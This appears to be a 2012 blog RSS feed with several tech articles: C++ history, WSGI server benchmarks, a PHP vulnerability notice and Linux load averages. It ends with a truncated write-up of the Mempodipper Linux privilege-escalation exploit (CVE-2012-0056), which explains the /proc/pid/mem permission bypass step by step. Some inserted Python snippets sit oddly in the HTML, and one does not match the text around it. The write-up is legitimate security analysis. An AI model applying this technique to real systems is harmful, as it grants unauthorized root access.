<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Unix Linux Windows</title>
	<atom:link href="http://www.enunix.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.enunix.com</link>
	<description>Just another WordPress site</description>
	<lastBuildDate>Thu, 09 Feb 2012 02:15:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>The Microsoft C++ Compiler Turns 20!</title>
		<link>http://www.enunix.com/1119.html</link>
		<comments>http://www.enunix.com/1119.html#comments</comments>
		<pubDate>Thu, 09 Feb 2012 02:15:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1119</guid>
		<description><![CDATA[This month, we enter the third decade of C++ at Microsoft. It was twenty years ago, in February of 1992, that we released our first C++ compiler: Microsoft C/C++ 7.0. Before then, we already worked with several of the C++ &#8230; <a href="http://www.enunix.com/1119.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>This month, we enter the third decade of C++ at Microsoft.</p>
<p>It was twenty years ago, in February of 1992, that we released our first C++ compiler: Microsoft C/C++ 7.0. Before then, we had already worked with several of the C++ “preprocessor” compilers that converted C++ to C before our compiler created the executable program. But starting in 1992, Microsoft’s premier native compiler supported C++ directly, and has done so ever since.</p>
<p>C/C++ 7.0 shipped in a box that was over two feet long and produced MS-DOS, Windows and OS/2 applications. It also sported the last of the character-oriented development environments for C that we ever shipped – the following product was Visual C++, which built on what we had learned from delivering QuickC. Since those early days, we have shipped eleven major releases of C/C++ products (ignoring small point upgrades) for both Windows and embedded development.</p>
<p>This month, on the 20th anniversary of our first C++ compiler, we’re looking forward to shipping the beta of Visual C++ 11. It includes support for ARM processors, Windows 8 tablet apps, C++ AMP for heterogeneous parallel computing, automatic parallelization, and the complete ISO C++11 standard library… and a few more of the new C++11 language features too.</p>
<p>Last summer, we pledged to publish the C++ AMP specification as an open specification that any compiler vendor may implement, to target any operating system platform. Today, we published the C++ AMP open specification to support using C++ for heterogeneous parallel computing on GPUs and multicore/SSE, with more to come in the future. Read the full announcement and download the specification at the Native Concurrency blog.</p>
<p>Finally, to make this anniversary celebration complete, we’re shifting gears to pick up speed: After Visual C++ 11 ships, you’ll see us deliver compiler and library features more frequently in shorter out-of-band release cycles than our historical 2- or 3-year timeframe. And, of course, the first and most important target of those more agile releases is to deliver more and more of the incredible value in the new ISO Standard C++11 language. Please check Herb Sutter&#8217;s keynote at GoingNative 2012 for further details.</p>
<p>After 20 years, C++ is alive and well, and going stronger and faster than ever, not just at Microsoft but across our industry. Use it. Love it. And go native!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1119.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>fcgi vs. gunicorn vs. uWSGI</title>
		<link>http://www.enunix.com/1127.html</link>
		<comments>http://www.enunix.com/1127.html#comments</comments>
		<pubDate>Mon, 06 Feb 2012 02:56:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[fcgi]]></category>
		<category><![CDATA[uwsgi]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1127</guid>
		<description><![CDATA[uwsgi is the latest and greatest WSGI server and promising to be the fastest possible way to run Nginx + Django. Proof here But! Is it that simple? Especially if you&#8217;re involving Django herself. So I set out to benchmark &#8230; <a href="http://www.enunix.com/1127.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://projects.unbit.it/uwsgi/">uwsgi</a> is the latest and greatest WSGI server and promises to be the fastest possible way to run Nginx + Django. <a href="http://nichol.as/benchmark-of-python-web-servers">Proof here</a>. But! Is it that simple? Especially if you&#8217;re involving Django herself.</p>
<p>So I set out to benchmark good old threaded <a href="http://djangoadvent.com/1.2/deploying-django-site-using-fastcgi/">fcgi</a> and <a href="http://gunicorn.org/">gunicorn</a>, and then, with a source-compiled nginx with the uwsgi module baked in, I also benchmarked uwsgi. The first mistake I made was testing a Django view that was using sessions and other crap. I had profiled the view to make sure it wouldn&#8217;t be the bottleneck, and it appeared to take only 0.02 seconds per request. However, with fcgi, gunicorn and uwsgi I kept being stuck at about 50 requests per second. Why? 1/0.02 = 50.0!!! Clearly the slowness of the Django view was the bottleneck (for the curious, what took all of 0.02 seconds was the need to create new session keys and put them into the database).</p>
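<p>The arithmetic behind that ceiling can be sketched in a few lines of Python. This is a simplification that assumes requests are effectively served one at a time; the <code>concurrency</code> parameter is a hypothetical knob added for illustration, not something measured in this benchmark.</p>

```python
def max_requests_per_second(seconds_per_request, concurrency=1):
    """Upper bound on throughput when every request holds a worker
    for a fixed amount of time (an idealised model, not a measurement)."""
    return concurrency / seconds_per_request


# A view that takes 0.02 seconds and is served serially caps out here:
print(max_requests_per_second(0.02))
```

<p>If the slow part is serialised somewhere (for example in the database), adding workers does not raise this bound, which would be consistent with all three servers stalling at the same number.</p>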
<p>So I wrote a really dumb Django view with no sessions middleware enabled. Now we&#8217;re getting some interesting numbers:</p>
<pre> fcgi (threaded)              640 r/s
 fcgi (prefork 4 processes)   240 r/s (*)
 gunicorn (2 workers)         1100 r/s
 gunicorn (5 workers)         1300 r/s
 gunicorn (10 workers)        1200 r/s (?!?)
 uwsgi (2 workers)            1800 r/s
 uwsgi (5 workers)            2100 r/s
 uwsgi (10 workers)           2300 r/s

 (* this made my computer exceptionally sluggish as CPU usage went through the roof)</pre>
<p><a href="http://www.enunix.com/1127.html/shootout" rel="attachment wp-att-1128"><img class="alignnone size-full wp-image-1128" title="shootout" src="http://www.enunix.com/wp-content/uploads/2012/02/shootout.png" alt="" width="655" height="582" /></a></p>
<p>If you&#8217;re wondering why the numbers appear to be rounded it&#8217;s because I ran the benchmark multiple times and guesstimated an average (also obviously excluded the first run).</p>
<p><strong>Misc notes</strong></p>
<ul>
<li>For gunicorn it didn&#8217;t change the numbers if I used a TCP (e.g. 127.0.0.1:9000) or a UNIX socket (e.g. /tmp/wsgi.sock)</li>
<li>Setting <code>fail_timeout=0</code> on the upstream directive in nginx made no difference to the benchmark.</li>
<li>fcgi on my laptop was unable to fork new processes automatically in this test, so it stayed as one single process! Why?!!</li>
<li>When you get more than 2,000 requests/second, the benchmark itself and the computer you run it on become wobbly. I managed to get 3,400 requests/second out of uwsgi but then the benchmark started failing requests.</li>
<li>These tests were done on an old 32-bit dual-core Thinkpad with 2 GB RAM :(</li>
<li>uwsgi was a bitch to configure. Most importantly, who the hell compiles source code these days when packages are so much much more convenient? (<a href="http://www.fry-it.com/">Fry-IT</a> hosts around 100 web servers that need patching and love)</li>
<li>Why would anybody want to use UNIX sockets when they can cause permission problems? TCP is so much more straightforward.</li>
<li><a href="http://gunicorn.org/tuning.html">changing the number of ulimits to 2048</a> did not improve my results on this computer</li>
<li>gunicorn is not available as a Debian package :(</li>
<li>Adding too many workers can actually damage your performance. See example of 10 workers on gunicorn.</li>
<li>I did not bother with mod_wsgi since I don&#8217;t want to go near Apache and, to be honest, last time I tried I got such mysterious errors from mod_wsgi that I ran away screaming.</li>
</ul>
<p><strong>Conclusion</strong></p>
<p><strong>gunicorn is the winner in my eyes.</strong> It&#8217;s easy to configure and get up and running, it&#8217;s certainly fast enough, and I don&#8217;t have to worry about stray threads being created willy nilly like with threaded fcgi. uwsgi is definitely worth coming back to the day I need to squeeze out a few more requests per second, but right now it just feels too inconvenient, as I can&#8217;t convince my sys admins to maintain compiled versions of nginx for the little extra benefit.</p>
<p>Having said that, the day uwsgi becomes available as a Debian package I&#8217;m all over it like a dog on an ass-flavored cookie.</p>
<p>And the &#8220;killer benefit&#8221; with gunicorn is that I can predict the memory usage. I found, on my laptop: 1 worker = 23 MB, 5 workers = 82 MB, 10 workers = 155 MB, and these numbers stayed like that very predictably, which means I can decide quite accurately how much RAM I should let Django (ab)use.</p>
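<p>As a rough illustration of that predictability, the three measurements quoted above can be fitted with a straight line. This is only a sketch: it assumes memory grows linearly with the worker count, and the function names are made up for the example.</p>

```python
def fit_line(points):
    """Ordinary least-squares fit of y = intercept + slope * x."""
    n = len(points)
    sum_x = sum(x for x, _ in points)
    sum_y = sum(y for _, y in points)
    sum_xy = sum(x * y for x, y in points)
    sum_xx = sum(x * x for x, _ in points)
    slope = (n * sum_xy - sum_x * sum_y) / (n * sum_xx - sum_x ** 2)
    intercept = (sum_y - slope * sum_x) / n
    return intercept, slope


# (workers, megabytes) as measured on the laptop in this post.
measurements = [(1, 23), (5, 82), (10, 155)]
base_mb, per_worker_mb = fit_line(measurements)


def estimate_memory_mb(workers):
    """Estimated total memory for a given worker count (hypothetical helper)."""
    return base_mb + per_worker_mb * workers


print(round(per_worker_mb, 1), round(estimate_memory_mb(8)))
```

<p>With these numbers each extra worker costs a little under 15 MB, so a budget for any worker count in between is easy to estimate. Numbers on other hardware or with a heavier Django project will differ.</p>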
<p><strong>UPDATE:</strong></p>
<p>Since this was published we, in my company, have changed all Django sites to run over uWSGI. It&#8217;s proven faster than any alternatives and extremely stable. We actually started using it before it was merged into core Nginx but considering how important this is and how many sites we have it&#8217;s not been a problem to run our own Nginx package.</p>
<p>Hail uWSGI!</p>
<p>Voila! Now feel free to flame away about the inaccuracies and what multitude of more wheels and knobs I could/should twist to get even more juice out.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1127.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Critical PHP Remote Vulnerability Introduced in Fix for PHP Hashtable Collision DOS</title>
		<link>http://www.enunix.com/1123.html</link>
		<comments>http://www.enunix.com/1123.html#comments</comments>
		<pubDate>Fri, 03 Feb 2012 09:08:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bug]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[max_input_vars]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1123</guid>
		<description><![CDATA[Today, Stefan Esser (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (update: assigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December. The Vulnerable Fix The fix to &#8230; <a href="http://www.enunix.com/1123.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Today, <a href="http://www.suspekt.org/" target="_blank">Stefan Esser</a> (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (<strong>update:</strong> assigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December.</p>
<h5>The Vulnerable Fix</h5>
<p>The fix to prevent hash collisions introduces a new configuration property in php.ini called</p>
<pre>max_input_vars</pre>
<p>This configuration element limits the number of variables that can be used in a request (e.g. http://request.com/foo.php?a=1&amp;b=2&amp;c=3). The default is set to 1000.</p>
<p>The changes were made to <a href="http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/php_variables.c?revision=321634&amp;view=markup" target="_link">php_variables.c</a> in the function php_register_variable_ex.</p>
<p>PHP starts off by “regis</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1123.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Understanding Linux CPU Load &#8211; when should you be worried?</title>
		<link>http://www.enunix.com/1120.html</link>
		<comments>http://www.enunix.com/1120.html#comments</comments>
		<pubDate>Fri, 03 Feb 2012 02:15:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[CPU]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Load]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1120</guid>
		<description><![CDATA[You might be familiar with Linux load averages already. Load averages are the three numbers shown with the uptime and top commands &#8211; they look like this: load average: 0.09, 0.05, 0.01 Most people have an inkling of what the load averages mean: the &#8230; <a href="http://www.enunix.com/1120.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>You might be familiar with Linux load averages already. Load averages are the three numbers shown with the <code>uptime</code> and <code>top</code> commands &#8211; they look like this:</p>
<div>load average: 0.09, 0.05, 0.01</div>
<p>Most people have an inkling of what the load averages mean: the three numbers represent averages over progressively longer periods of time (one, five, and fifteen minute averages), and lower numbers are better. Higher numbers represent a problem or an overloaded machine. But what&#8217;s the threshold? What constitutes &#8220;good&#8221; and &#8220;bad&#8221; load average values? When should you be concerned over a load average value, and when should you scramble to fix it ASAP?</p>
<p>First, a little background on what the load average values mean. We&#8217;ll start out with the simplest case: a machine with one single-core processor.</p>
<h2>The traffic analogy</h2>
<p>A single-core CPU is like a single lane of traffic. Imagine you are a bridge operator &#8230; sometimes your bridge is so busy there are cars lined up to cross. You want to let folks know how traffic is moving on your bridge. A decent metric would be <em>how many cars are waiting</em> at a particular time. If no cars are waiting, incoming drivers know they can drive across right away. If cars are backed up, drivers know they&#8217;re in for delays.</p>
<p>So, Bridge Operator, what numbering system are you going to use? How about:</p>
<ul>
<li><strong>0.00 means there&#8217;s no traffic on the bridge at all</strong>. In fact, between 0.00 and 1.00 means there&#8217;s no backup, and an arriving car will just go right on.</li>
<li><strong>1.00 means the bridge is <em>exactly</em> at capacity.</strong> All is still good, but if traffic gets a little heavier, things are going to slow down.</li>
<li><strong>over 1.00 means there&#8217;s backup.</strong> How much? Well, 2.00 means that there are two lanes&#8217; worth of cars total: one lane&#8217;s worth on the bridge, and one lane&#8217;s worth waiting. 3.00 means there are three lanes&#8217; worth total: one lane&#8217;s worth on the bridge, and two lanes&#8217; worth waiting. Etc.</li>
</ul>
<p><img src="http://img.skitch.com/20090728-jek9ssauydsi19nbcja26tw8ju.png" alt="" /> = load of 1.00</p>
<p><img src="http://img.skitch.com/20090728-c3278n4dj5t766u5mcjhwb2h57.png" alt="" /> = load of 0.50</p>
<p><img src="http://img.skitch.com/20090728-89jd6aydgwd9j26in49h7y1n7g.png" alt="" /> = load of 1.70</p>
<p>This is basically what CPU load is. &#8220;Cars&#8221; are processes using a slice of CPU time (&#8220;crossing the bridge&#8221;) or queued up to use the CPU. Unix refers to this as the <em>run-queue length</em>: the sum of the number of processes that are currently running plus the number that are waiting (queued) to run.</p>
<p>Like the bridge operator, you&#8217;d like your cars/processes to never be waiting. So, your CPU load should ideally stay below 1.00. Also like the bridge operator, you are still ok if you get some temporary spikes above 1.00 &#8230; but when you&#8217;re consistently above 1.00, you need to worry.</p>
<h2>So you&#8217;re saying the ideal load is 1.00?</h2>
<p>Well, not exactly. The problem with a load of 1.00 is that you have no headroom. In practice, many sysadmins will draw a line at 0.70:</p>
<ul>
<li>The <strong>&#8220;Need to Look into it&#8221;</strong> Rule of Thumb: <strong>0.70</strong>. If your load average is staying above 0.70, it&#8217;s time to investigate before things get worse.</li>
<li>The <strong>&#8220;Fix this now&#8221;</strong> Rule of Thumb: <strong>1.00</strong>. If your load average stays above 1.00, find the problem and fix it now. Otherwise, you&#8217;re going to get woken up in the middle of the night, and it&#8217;s not going to be fun.</li>
<li>The <strong>&#8220;Arrgh, it&#8217;s 3AM WTF?&#8221;</strong> Rule of Thumb: <strong>5.0</strong>. If your load average is above 5.00, you could be in serious trouble: your box is either hanging or slowing way down, and this will (inexplicably) happen at the worst possible time, like in the middle of the night or when you&#8217;re presenting at a conference. Don&#8217;t let it get there.</li>
</ul>
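<p>The three rules of thumb above can be written down as a small lookup. This is a sketch for a single-core machine; the function name and the level labels are invented for the example, and the input is meant to be a sustained average rather than a momentary spike.</p>

```python
def classify_load(load_average):
    """Map a sustained single-core load average to the rule-of-thumb levels."""
    if load_average > 5.0:
        return "critical"      # the "Arrgh, it's 3AM" rule
    if load_average > 1.0:
        return "fix now"       # the "Fix this now" rule
    if load_average > 0.7:
        return "investigate"   # the "Need to look into it" rule
    return "ok"


for sample in (0.36, 0.85, 1.70, 6.20):
    print(sample, classify_load(sample))
```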
<h2>What about Multi-processors? My load says 3.00, but things are running fine!</h2>
<p>Got a quad-processor system? It&#8217;s still healthy with a load of 3.00.</p>
<p>On a multi-processor system, the load is relative to the number of processor cores available. The &#8220;100% utilization&#8221; mark is 1.00 on a single-core system, 2.00 on a dual-core, 4.00 on a quad-core, etc.</p>
<p>If we go back to the bridge analogy, the &#8220;1.00&#8221; really means &#8220;one lane&#8217;s worth of traffic&#8221;. On a one-lane bridge, that means it&#8217;s filled up. On a two-lane bridge, a load of 1.00 means it&#8217;s at 50% capacity: only one lane is full, so there&#8217;s another whole lane that can be filled.</p>
<p><img src="http://img.skitch.com/20090728-8n99xu7xq1hkixcahtn6pgciin.pn" alt="" /> = load of 2.00 on two-lane road</p>
<p>Same with CPUs: a load of 1.00 is 100% CPU utilization on a single-core box. On a dual-core box, a load of 2.00 is 100% CPU utilization.</p>
<h2>Multicore vs. multiprocessor</h2>
<p>While we&#8217;re on the topic, let&#8217;s talk about multicore vs. multiprocessor. For performance purposes, is a machine with a single dual-core processor basically equivalent to a machine with two processors with one core each? Yes. Roughly. There are lots of subtleties here concerning amount of cache, frequency of process hand-offs between processors, etc. Despite those finer points, for the purposes of sizing up the CPU load value, the <em>total number of cores</em> is what matters, regardless of how many physical processors those cores are spread across.</p>
<p>Which leads us to two new Rules of Thumb:</p>
<ul>
<li><em>The &#8220;number of cores = max load&#8221;</em> Rule of Thumb: on a multicore system, your load should not exceed the number of cores available.</li>
<li>The <em>&#8220;cores is cores&#8221;</em> Rule of Thumb: How the cores are spread out over CPUs doesn&#8217;t matter. Two quad-cores == four dual-cores == eight single-cores. It&#8217;s all eight cores for these purposes.</li>
</ul>
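<p>Both rules boil down to dividing the load by the total core count. A minimal sketch, with hypothetical helper names:</p>

```python
def load_per_core(load_average, total_cores):
    """Normalise a load average by the total number of cores,
    regardless of how many physical processors they sit on."""
    return load_average / total_cores


def utilization_percent(load_average, total_cores):
    """Express the load as a percentage of the '100% utilization' mark."""
    return 100.0 * load_per_core(load_average, total_cores)


# A load of 3.00 on a quad-core box leaves headroom:
print(load_per_core(3.0, 4))
# A load of 1.00 on a dual-core box is half of capacity:
print(utilization_percent(1.0, 2))
```

<p>The per-core figure can then be compared against the same single-core thresholds (0.70, 1.00, 5.00) discussed earlier.</p>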
<h2>Bringing It Home</h2>
<p>Let&#8217;s take a look at the load averages output from <code>uptime</code>:</p>
<div>~ $ uptime<br />
23:05 up 14 days, 6:08, 7 users, load averages: 0.65 0.42 0.36</div>
<p>This is on a dual-core CPU, so we&#8217;ve got lots of headroom. I won&#8217;t even think about it until load gets and stays above 1.7 or so.</p>
<p>Now, what about those three numbers? 0.65 is the average over the last minute, 0.42 is the average over the last five minutes, and 0.36 is the average over the last 15 minutes. Which brings us to the question:</p>
<p><strong>Which average should I be observing? One, five, or 15 minute?</strong></p>
<p>For the numbers we&#8217;ve talked about (1.00 = fix it now, etc), you should be looking at the five or 15-minute averages. Frankly, if your box spikes above 1.0 on the one-minute average, you&#8217;re still fine. It&#8217;s when the 15-minute average goes north of 1.0 and stays there that you need to snap to. (obviously, as we&#8217;ve learned, adjust these numbers to the number of processor cores your system has).</p>
<p><strong>So # of cores is important to interpreting load averages &#8230; how do I know how many cores my system has?</strong></p>
<p>Run <code>cat /proc/cpuinfo</code> to get info on each processor in your system. <em>Note: not available on OSX, Google for alternatives</em>. To get just a count, run it through <code>grep</code> and word count: <code>grep 'model name' /proc/cpuinfo | wc -l</code></p>
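<p>The same count can be taken from a script. The sketch below mirrors the <code>grep | wc -l</code> approach and falls back to Python&#8217;s <code>os.cpu_count()</code> where <code>/proc/cpuinfo</code> is missing or has no &#8220;model name&#8221; lines; the function names are invented for the example. Note that this counts logical processors, so hyperthreads are included.</p>

```python
import os


def count_cores(cpuinfo_text):
    """Count 'model name' lines, like grep 'model name' | wc -l."""
    return sum(1 for line in cpuinfo_text.splitlines() if "model name" in line)


def system_cores(path="/proc/cpuinfo"):
    """Core count from /proc/cpuinfo, falling back to os.cpu_count()."""
    try:
        with open(path) as handle:
            count = count_cores(handle.read())
    except OSError:
        count = 0  # file not present, e.g. on OS X
    return count or os.cpu_count() or 1


sample = "processor\t: 0\nmodel name\t: Example CPU\nprocessor\t: 1\nmodel name\t: Example CPU\n"
print(count_cores(sample))
```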
<h2>Monitoring Linux CPU Load with Scout</h2>
<p><a href="http://scoutapp.com/">Scout</a> provides 2 ways to monitor the CPU load. Our <a href="http://scoutapp.com/plugin_urls/4-server-load">original server load plugin</a> and <a href="http://scoutapp.com/plugin_urls/151-load-per-processor">Jesse Newland&#8217;s Load-Per-Processor plugin</a> both report the CPU load and alert you when the load peaks and/or is trending in the wrong direction.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1120.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Local Privilege Escalation via SUID /proc/pid/mem Write</title>
		<link>http://www.enunix.com/1116.html</link>
		<comments>http://www.enunix.com/1116.html#comments</comments>
		<pubDate>Mon, 30 Jan 2012 08:26:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Kernel]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Privilege]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1116</guid>
		<description><![CDATA[Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were &#8230; <a href="http://www.enunix.com/1116.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Introducing <a href="http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c">Mempodipper</a>, an exploit for CVE-2012-0056. <tt>/proc/<em>pid</em>/mem</tt> is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to <tt>/proc/<em>pid</em>/mem</tt> were deemed sufficient, and so the prior <tt>#ifdef</tt> that prevented write support for writing to arbitrary process memory <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=198214a7">was removed</a>. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. <em>This means that all Linux kernels &gt;=2.6.39 are vulnerable</em>, up until the <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc">fix commit for it</a> a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.</p>
<p>When <tt>/proc/<em>pid</em>/mem</tt> is opened, this kernel code is called:</p>
<div>
<div>
<pre>static int mem_open(struct inode* inode, struct file* file)
{
	file-&gt;private_data = (void*)((long)current-&gt;self_exec_id);
	/* OK to pass negative loff_t, we can catch out-of-range */
	file-&gt;f_mode |= FMODE_UNSIGNED_OFFSET;
	return 0;
}</pre>
</div>
</div>
<p>There are no restrictions on opening; anyone can open the <tt>/proc/<em>pid</em>/mem</tt> <a href="http://en.wikipedia.org/wiki/File_descriptor">fd</a> for any process (subject to the ordinary VFS restrictions). It simply makes note of the original process’s <tt>self_exec_id</tt> that it was opened with and stores this away for checking later during reads and writes.</p>
<p>Writes (and reads), however, have permissions checking restrictions. Let’s take a look at the write function:</p>
<div>
<div>
<pre>static ssize_t mem_write(struct file * file, const char __user *buf,
			 size_t count, loff_t *ppos)
{

/* unimportant code removed for blog post */	

	struct task_struct *task = get_proc_task(file-&gt;f_path.dentry-&gt;d_inode);

/* unimportant code removed for blog post */

	mm = check_mem_permission(task);
	copied = PTR_ERR(mm);
	if (IS_ERR(mm))
		goto out_free;

/* unimportant code removed for blog post */	

	if (file-&gt;private_data != (void *)((long)current-&gt;self_exec_id))
		goto out_mm;

/* unimportant code removed for blog post
 * (the function here goes onto write the buffer into the memory)
 */</pre>
</div>
</div>
<p>So there are two relevant checks in place to prevent unauthorized writes: <tt>check_mem_permission</tt> and <tt>self_exec_id</tt>. Let’s do the first one first and second one second.</p>
<p>The code of <tt>check_mem_permission</tt> simply calls into <tt>__check_mem_permission</tt>, so here’s the code of that:</p>
<div>
<div>
<pre>static struct mm_struct *__check_mem_permission(struct task_struct *task)
{
	struct mm_struct *mm;

	mm = get_task_mm(task);
	if (!mm)
		return ERR_PTR(-EINVAL);

	/*
	 * A task can always look at itself, in case it chooses
	 * to use system calls instead of load instructions.
	 */
	if (task == current)
		return mm;

	/*
	 * If current is actively ptrace'ing, and would also be
	 * permitted to freshly attach with ptrace now, permit it.
	 */
	if (task_is_stopped_or_traced(task)) {
		int match;
		rcu_read_lock();
		match = (ptrace_parent(task) == current);
		rcu_read_unlock();
		if (match &amp;&amp; ptrace_may_access(task, PTRACE_MODE_ATTACH))
			return mm;
	}

	/*
	 * No one else is allowed.
	 */
	mmput(mm);
	return ERR_PTR(-EPERM);
}</pre>
</div>
</div>
<p>There are two ways that the memory write is authorized. Either <tt>task == current</tt>, meaning that the process being written to is the process writing, or <tt>current</tt> (the process writing) has esoteric ptrace-level permissions to play with <tt>task</tt> (the process being written to). Maybe you think you can trick the ptrace code? It’s tempting. But I don’t know. Let’s instead figure out how we can make a process write arbitrary memory to itself, so that <tt>task == current</tt>.</p>
<p>Now naturally, we want to write into the memory of <a href="http://en.wikipedia.org/wiki/Setuid">suid processes</a>, since then we can get root. Take a look at this:</p>
<div>
<div>
<pre>$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy</pre>
</div>
</div>
<p><tt>su</tt> will spit out whatever text you want onto stderr, prefixed by “Unknown id:”. So, we can open a fd to <tt>/proc/self/mem</tt>, <tt>lseek</tt> to the right place in memory for writing (more on that later), use <a href="http://en.wikipedia.org/wiki/Redirection_(computing)"><tt>dup2</tt></a> to couple together stderr and the mem fd, and then <a href="http://en.wikipedia.org/wiki/Exec_(operating_system)"><tt>exec</tt></a> to <tt>su $shellcode</tt> to write a shell spawner to the process memory, and then we have root. Really? Not so easy.</p>
<p>Here the other restriction comes into play. After it passes the <tt>task == current</tt> test, it then checks to see if the current <tt>self_exec_id</tt> matches the <tt>self_exec_id</tt> that the fd was opened with. What on earth is <tt>self_exec_id</tt>? It’s <a href="http://lxr.linux.no/linux+v3.2.1/+search?search=self_exec_id">only referenced in a few places</a> in the kernel. The most important one happens to be inside of <tt>exec</tt>:</p>
<div>
<div>
<pre>void setup_new_exec(struct linux_binprm * bprm)
{
/* massive amounts of code trimmed for the purpose of this blog post */

	/* An exec changes our domain. We are no longer part of the thread
	   group */

	current-&gt;self_exec_id++;

	flush_signal_handlers(current, 0);
	flush_old_files(current-&gt;files);
}
EXPORT_SYMBOL(setup_new_exec);</pre>
</div>
</div>
<p><tt>self_exec_id</tt> is incremented each time a process <tt>exec</tt>s. So in this case, it functions so that you can’t open the fd in a non-suid process, <tt>dup2</tt>, and then <tt>exec</tt> to a suid process… which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?</p>
<p>Here’s how to get around it. We fork a child, and inside of that child, we <tt>exec</tt> to <em>a new process</em>. The initial child fork has a <tt>self_exec_id</tt> equal to its parent. When we <tt>exec</tt> to a new process, <tt>self_exec_id</tt> increments by one. Meanwhile, the parent itself is busy <tt>exec</tt>ing to our shellcode-writing <tt>su</tt> process, so its <tt>self_exec_id</tt> gets incremented to the same value. So what we do is this: we make this child fork and <tt>exec</tt> to a new process, and inside of that new process, we <em>open up a fd to <tt>/proc/parent-pid/mem</tt> using the pid of the parent process, not our own process</em> (as was the case prior). We can open the fd like this because there is no permissions checking for a mere open. When it is opened, its <tt>self_exec_id</tt> has already incremented to the right value that the parent’s <tt>self_exec_id</tt> will be when we <tt>exec</tt> to <tt>su</tt>. So finally, we pass our opened fd from the child process back to the parent process (using some <a href="http://archives.neohapsis.com/archives/postfix/2000-09/1476.html">very black unix domain sockets magic</a>), do our <tt>dup2</tt>ing, and <tt>exec</tt> into <tt>su</tt> with the shellcode.</p>
<p>There is one remaining objection. Where do we write to? We have to <tt>lseek</tt> to the proper memory location before writing, and <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR</a> randomizes process address spaces, making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:</p>
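<p>The counter bookkeeping is easier to follow in a toy model. The sketch below is plain Python, not kernel code: <code>Task</code> and <code>MemFd</code> are invented stand-ins that only track <tt>self_exec_id</tt>, and the <tt>task == current</tt> check is left out because it passes in both scenarios (the parent writes to its own memory).</p>

```python
class Task:
    """Stand-in for a process; only tracks self_exec_id."""

    def __init__(self, self_exec_id=0):
        self.self_exec_id = self_exec_id

    def fork(self):
        # A forked child starts with the parent's self_exec_id.
        return Task(self.self_exec_id)

    def do_exec(self):
        # setup_new_exec() increments the counter on every exec.
        self.self_exec_id += 1


class MemFd:
    """Stand-in for an open /proc/pid/mem fd; mem_open() records the opener's id."""

    def __init__(self, opener):
        self.private_data = opener.self_exec_id

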